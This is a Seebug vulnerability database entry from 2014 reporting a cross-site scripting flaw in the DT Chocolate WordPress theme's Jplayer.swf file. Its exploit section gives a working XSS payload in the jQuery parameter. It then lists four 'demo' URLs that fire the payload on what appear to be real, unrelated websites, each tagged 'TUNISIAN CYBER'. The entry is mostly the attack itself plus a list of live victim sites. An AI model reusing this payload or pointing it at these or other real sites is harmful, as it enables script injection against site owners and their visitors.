WordPress DT Chocolate跨站脚本漏洞

2014-01-17T00:00:00
ID SSV:61342
Type seebug
Reporter Root
Modified 2014-01-17T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Exploit:
Wordpress Theme DT Chocolate suffers from an xss vulnerability.
+P.O.C:
127.0.0.1/[PATH]/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/TUNISIAN CYBER/)//

Demo:
http://www.impala-miami.com/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://reportagesphotos-kaddouchmagali.fr/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://www.laluzdeunangel.com/nuevo/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)//
http://orianneboulage.fr/wp-content/themes/dt-chocolate/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/TUNISIAN%20CYBER/)//
./3nD